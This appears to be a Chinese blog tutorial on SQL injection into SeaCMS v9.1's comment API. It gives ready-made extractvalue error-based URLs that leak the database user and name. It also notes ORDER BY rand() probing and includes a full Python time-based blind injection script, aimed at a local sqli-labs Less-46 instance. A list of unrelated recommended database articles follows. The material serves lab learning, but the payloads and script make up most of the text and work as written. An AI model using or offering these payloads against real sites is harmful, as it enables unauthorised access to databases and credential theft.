seacmsv9注入管理员账号密码+orderby+limit

seacmsv9存在SQL注入漏洞,漏洞文件是./comment/api/index.php,在网页代码中找到用户提交的rlist参数,攻击者可以在rlist参数处注入SQL代码,构造恶意rlist参数

复制代码
http://127.0.0.1/seacmsv9.1/upload/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20user()))),@`%27`
复制代码
http://127.0.0.1/seacmsv9.1/upload/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,database())),@`%27`

输入?sort=rand(true)和?sort=rand(false)时,页面排序结果不同,则看通过构造条件表达式来出发不同的回显。

复制代码
 import requests
 import time
 ​
 def inject_database(url):
     name = ''
     for i in range(1, 20):
         low = 32
         high = 128
         mid = (low + high) // 2
         while low < high:
             # 构造时间盲注payload
             payload = "if((ascii(substr(database(),%d,1))>%d),sleep(1),1)" % (i, mid)
             # 传参
             params = {"sort": payload}
             start_time = time.time()
             # 异常处理
             try:
                 r = requests.get(url, params=params, timeout=20)
             except requests.Timeout:
                 print("Request timed out.")
                 continue
             end_time = time.time()
             if end_time - start_time >= 1:
                 low = mid + 1
             else:
                 high = mid
             mid = (low + high) // 2
         if mid == 32:
             break
         name += chr(mid)
         print(name)
 ​
 ​
 if __name__ == "__main__":
     url = 'http://127.0.0.1/sqli-labs-php7/Less-46/index.php'
     inject_database(url)
 ​
相关推荐
Quincy_Freak34 分钟前
银河麒麟aarch64如何高效做数据分析?分享一款内网离线数据分析利器
大数据·数据库·数据挖掘·数据分析·aarch64
香气袭人知骤暖1 小时前
PG数据库 Docker 容器自动备份方案
数据库·docker·容器
me8321 小时前
【Linux】Linux 目录命名规范溯源(Linux各个目录究竟是干嘛的)
linux·运维·数据库
土狗TuGou1 小时前
SQL内功笔记 · 第2篇:列的约束
数据库·笔记·sql
java_cj2 小时前
MySQL 执行原理深度剖析:查询成本计算与优化器内幕
数据库·后端·mysql
java_cj2 小时前
数据库范式化设计与性能优化全攻略
数据库·后端·性能优化·架构·开源
Noushiki2 小时前
MySQL索引优化实战:高效查询的黄金法则
数据库·sql·mysql
TDengine (老段)2 小时前
TDengine Commit 与 Flush 机制 — 从内存到磁盘的数据落盘全流程
大数据·数据库·物联网·架构·时序数据库·iot·tdengine
ID_180079054733 小时前
(淘宝 / 京东)商品评论 API 接口:技术实战案例与架构分析
服务器·数据库·架构
爱莉希雅&&&3 小时前
Zabbix监控初步搭建
linux·运维·数据库·mysql·zabbix